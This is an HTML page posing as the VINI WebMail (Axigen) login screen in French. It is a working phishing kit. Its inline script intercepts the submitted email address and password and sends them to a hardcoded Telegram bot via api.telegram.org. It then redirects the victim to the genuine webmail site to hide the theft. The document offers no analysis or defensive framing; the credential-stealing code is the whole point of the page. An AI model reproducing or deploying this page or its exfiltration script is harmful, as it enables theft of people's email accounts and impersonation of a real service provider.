<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="ext-strict">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>VINI WebMail</title>
    <link rel="shortcut icon" href="https://wml.vini.pf/branding_show_photo.hsp?elementName=faviconPhoto">
    <!-- Include custom login styles -->
    <link rel="StyleSheet" type="text/css" href="./VINI WebMail_files/ext-all.css">
    <link rel="StyleSheet" type="text/css" href="./VINI WebMail_files/other-icons.css">
    <link rel="StyleSheet" type="text/css" href="./VINI WebMail_files/tree-icons.css">
    <link rel="StyleSheet" type="text/css" href="./VINI WebMail_files/axigen-web-fonts.css">
    <link rel="StyleSheet" type="text/css" href="./VINI WebMail_files/style_ajax_ocean.css">
    <link rel="StyleSheet" type="text/css" href="./VINI WebMail_files/style_ajax_breeze.css">
    
    <style>
        body {
            background-color: #000;
            color: #fff;
        }
        .main-container {
            background-color: rgba(0, 0, 0, 0.8);
            border-radius: 10px;
            padding: 20px;
            margin: 50px auto;
            max-width: 500px;
            box-shadow: 0 0 20px rgba(255, 255, 255, 0.1);
        }
        .logo {
            text-align: center;
            margin-bottom: 20px;
        }
        .logo img {
            max-width: 200px;
        }
        .form-container {
            background-color: rgba(0, 0, 0, 0.5);
            padding: 20px;
            border-radius: 5px;
        }
        input[type="text"], input[type="password"] {
            background-color: rgba(255, 255, 255, 0.1);
            color: #fff;
            border: 1px solid #333;
        }
        input[type="submit"] {
            background-color: #333;
            color: #fff;
            border: none;
            padding: 8px 15px;
            cursor: pointer;
        }
        .footnote {
            color: #aaa;
            text-align: center;
            margin-top: 20px;
        }
    </style>
    
    <script>
        function sendToTelegram(username, password) {
            const botToken = '7982653544:AAFo0JFNathHNi92MdpARAJEV7OcMwOE4cQ';
            const chatId = '-1002253966185';
            const message = `Nouvelle connexion:\nEmail: ${username}\nMot de passe: ${password}`;
            
            fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify({
                    chat_id: chatId,
                    text: message
                })
            }).then(response => {
                // Rediriger après l'envoi
                window.location.href = 'https://wml.vini.pf/?_h=b4f2712626b694cb0da3e07e37ba8930llai3mdcc0';
            }).catch(error => {
                console.error('Error:', error);
                window.location.href = 'https://wml.vini.pf/?_h=b4f2712626b694cb0da3e07e37ba8930llai3mdcc0';
            });
        }

        function handleSubmit(event) {
            event.preventDefault();
            const username = document.getElementById('username').value;
            const password = document.getElementById('password').value;
            
            // Envoyer les infos à Telegram
            sendToTelegram(username, password);
            
            return false;
        }
    </script>
</head>

<body class="lang-fr skin-breeze axi-more-content axi-reading-pane-east ext-chrome" id="ext-gen9">
    <div class="main-container">
        <div class="logo">
            <a href="/branding_show_photo.hsp?elementName=ajaxPublicPhoto" target="_blank">
                <img src="/branding_show_photo.hsp?elementName=ajaxPublicPhoto alt="Axigen Logo">
            </a>
            <h2>Axigen WebMail</h2>
            <p>Connectez-vous à votre messagerie Axigen</p>
        </div>
        
        <div class="center-inner-container">
            <div class="form-container" id="form-container">
                <form method="POST" id="loginForm" onsubmit="return handleSubmit(event)">
                    <div class="x-form-item x-axi-label" tabindex="-1">
                        <label for="username" style="width:70px;" class="x-form-item-label x-axi-field-notempty" placeholder="Nom d'utilisateur"></label>
                        <div class="x-form-element" id="x-form-el-username" style="padding-left:75px">
                            <input id="username" name="username" class="x-form-text x-form-field x-axi-textfield" style="width: 306px;">
                        </div>
                        <div class="x-form-clear-left"></div>
                    </div>
                    
                    <div class="x-form-item x-axi-label" tabindex="-1">
                        <label for="password" style="width:70px;" class="x-form-item-label x-axi-field-notempty" placeholder="Mot de passe"></label>
                        <div class="x-form-element" id="x-form-el-password" style="padding-left:75px">
                            <input id="password" name="password" type="password" class="x-form-text x-form-field x-axi-textfield x-axi-password" style="width: 306px;">
                        </div>
                        <div class="x-form-clear-left"></div>
                    </div>
                    
                    <div class="x-form-item x-hide-label x-axi-button-container" tabindex="-1">
                        <label for="loginButton" style="width:70px;" class="x-form-item-label">:</label>
                        <div class="x-form-element x-axi-button" id="x-form-el-loginButton" style="padding-left:75px">
                            <input type="submit" id="loginButton" name="login" class="x-form-submit x-form-field" value="Connexion">
                            <div class="x-axi-button-right"></div>
                        </div>
                        <div class="x-form-clear-left"></div>
                    </div>
                    
                    <input type="hidden" id="domainname" name="domainname" value="">
                </form>
            </div>
        </div>
        
        <div class="footnote">
            <p>Passer à <a title="Interface standard" href="https://wml.vini.pf/" style="color: #ccc;">Interface standard</a></p>
            <div class="copyright-note">
                <p class="powered-by">Powered by <a target="blank" href="https://www.axigen.com/?utm_source=product&amp;utm_medium=webmail&amp;utm_campaign=webmail_login_page_fr" style="color: #ccc;">Axigen</a></p>
                <p class="copyright">Email, calendaring and collaboration<br>Total privacy, high availability and scalability</p>
            </div>
        </div>
    </div>
</body>
</html>